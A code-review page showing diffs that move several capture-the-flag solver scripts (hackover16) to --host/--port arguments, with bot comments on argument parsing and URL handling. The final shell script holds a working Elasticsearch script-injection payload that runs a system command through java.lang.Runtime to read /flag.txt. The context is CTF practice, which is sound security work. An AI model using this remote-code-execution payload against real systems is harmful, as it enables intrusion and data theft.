#!/usr/bin/env python2.7
+from argparse import ArgumentParser
import sys
import telnetlib
import rng
from rng import RNG
-host = "localhost"
-port = 1337
+
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
ARGS = (2**31, 7**6, 5)
if __name__ == "__main__":
- main(host, port)
+ main(HOST, PORT)
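Review bot: The parser is built and `parse_args()` is called at module top level, so it runs on any import of this file and will consume or reject the importing program's command line. Since the file already has an `if __name__ == "__main__":` guard, move the parsing under it and call `main(args.host, args.port)` directly, which also makes the `HOST`/`PORT` globals unnecessary. The same block is added at module scope in the three other Python scripts on this page. `prog=sys.argv[0]` and `action='store'` can be dropped, because argparse already derives prog from `sys.argv[0]` and `store` is the default action. `--port` accepts any integer, so a 1–65535 range check would turn a bad value into a usage error instead of a failure that presumably surfaces later in the connection code.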
#!/usr/bin/env python3
+from argparse import ArgumentParser
import base64
import sys
import telnetlib
-if len(sys.argv) != 3:
- print('Usage: {} host port'.format(sys.argv[0]))
- sys.exit(1)
-HOST = sys.argv[1]
-PORT = int(sys.argv[2])
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
def xor(xs, ys):
#!/usr/bin/env python2.7
from Crypto.Cipher import AES
+from argparse import ArgumentParser
import base64
import struct
import sys
import telnetlib
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
+
ciphertext = 'nXThFPCdp6OfGwaBwuF0+w=='
cipherbytes = base64.b64decode(ciphertext)
def main():
- attack(sys.argv[1], int(sys.argv[2]))
+ attack(HOST, PORT)
if __name__ == "__main__":
main()
#!/usr/bin/env python3
+from argparse import ArgumentParser
import sys
import re
import requests
+
+parser = ArgumentParser(prog=sys.argv[0])
+parser.add_argument('--host', action='store', default='localhost', help='target host')
+parser.add_argument('--port', type=int, default=1337, help='target port')
+args = parser.parse_args()
+
+HOST = args.host
+PORT = args.port
+
+
def attack(base_url):
base_url = base_url.rstrip('/')
resp = requests.get(base_url + '/')
def main():
- attack(sys.argv[1])
+ attack(''.join(['http://', HOST, ':', str(PORT)]))
if __name__ == '__main__':
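Review bot: The new call in `main()` hard-codes the `http://` scheme, so the script can no longer be given an HTTPS endpoint or a base URL with a path prefix, both of which the old `attack(sys.argv[1])` accepted. An IPv6 literal passed as `--host` would also produce an invalid URL, because it is not wrapped in brackets. Consider adding a `--scheme` option that defaults to `http` and building the URL with `'{}://{}:{}'.format(args.scheme, HOST, PORT)`, which also reads more clearly than the `''.join([...])` form. Only the first lines of `attack()` are visible here, so its handling of the URL beyond `rstrip('/')` could not be checked.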
#!/bin/sh
test -z "$1" && exit 1
+test -z "$2" && exit 1
+test -z "$3" && exit 1
+test -z "$4" && exit 1
+HOST="$2"
+PORT="$4"
SPLOIT='onion"}},"script_fields":{"pwn":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat%20/flag.txt\").getText()'
-curl -sSg "$1/search/?q=$SPLOIT" | grep "hackover16"
+curl -sSg "http://$HOST:$PORT/search/?q=$SPLOIT" | grep "hackover16"
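Review bot: `HOST` and `PORT` are taken from `$2` and `$4` purely by position, and nothing checks that `$1` is `--host` and `$3` is `--port`. As a result `--port 1337 --host x` silently swaps the two values, and any word in the flag slots is accepted. Add a guard before the assignments, for example `[ "$1" = "--host" ] && [ "$3" = "--port" ] || exit 1`. The script also exits with status 1 and no message when an argument is missing; a usage line on stderr such as `echo "usage: $0 --host HOST --port PORT" >&2` would make a failed run diagnosable. Unlike the Python scripts on this page, this one has no defaults for host and port, so the command-line interfaces are not quite uniform.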